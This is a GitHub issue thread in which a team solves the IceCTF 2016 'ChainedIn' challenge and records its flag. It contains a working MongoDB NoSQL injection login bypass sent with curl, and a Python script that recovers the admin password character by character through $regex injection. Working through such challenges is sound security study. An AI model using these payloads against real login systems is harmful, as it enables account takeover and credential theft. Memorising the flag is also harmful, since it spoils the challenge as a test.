search

DeadpoolAndObjectOrientedProgramming / icectf-2016

IceCTF 2016 repo
0 stars 0 forks source link

Stage 3 - ChainedIn #39

Closed ikornaselur closed 8 years ago

ikornaselur commented 8 years ago

Description

I keep getting so much spam from this website. Can you leak the admin password so I can put a stop this nonsense? I made an account for you to help you break in, the username is agent1568 and the password is agent1568

Solution

Flag is: IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_monGo}

koddsson commented 8 years ago

This is maybe a mongodb nosql injection thing

koddsson commented 8 years ago

It infuriates me that 101 teams have solved this. I've gotten this working so far:

☁  chainedin  cat exploit.sh
curl 'http://chainedin.vuln.icec.tf/login' \
  -H 'Content-Type: application/json' \
  --data '{"user":{"$ne": "agent1568"},"pass": {"$gt": ""}}'
☁  chainedin  ./exploit.sh
{"message":"Welcome back Administrator!"}%

but I'm not sure how I can trick it to give us the password. The API seems to be similar to this code example for a noSQL attack like the one in described in the code block above.

koddsson commented 8 years ago

Not sure if it's relevant at all but I talked to Glitch on IRC and here's a screengrab:

image

Figured I'd document more rather than document less ;)

koddsson commented 8 years ago

Solved!

We exploited the $regex operator in mongo to start guessing the password through trial and error. Kind of suprised that this challanges was basically a bruteforce but whatever 🎋

Here's the script I used.

import sys
import json
import requests

flag = 'IceCTF{'
alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_'

while True:
    for x in alphabet:
        payload = json.dumps({"user": "admin","pass": {"$regex": flag + x}})
        r = requests.post(
            'http://chainedin.vuln.icec.tf/login',
            data=payload,
            headers={'Content-Type': 'application/json'}
        )
        if r.status_code == 200:
            flag = flag + x
            print flag
            if x == '}':
                sys.exit()
        else:
            print "Trying: " + flag + x + " got: " + str(r.status_code)
ikornaselur commented 8 years ago

While it's technically brute forcing, it's not the same as traditional brute forcing in that sense that we don't have to try every single combination available.

Imagine that we have 10 characters available in the password (0-9) and the password is 10 characters long. If we'd try every single combination of the password, we'd have to try between 1 and 10^10 (10.000.000.000) password.

Now with the regex exploitation, they're leaking a part of the password. It would take us between 1 and 10 requests to figure out the first character, then another 1-10 for the next one and so on.. giving us the worst case scenario of 10*10 (100) requests! Much less than the 10 billion!

Not bad 😋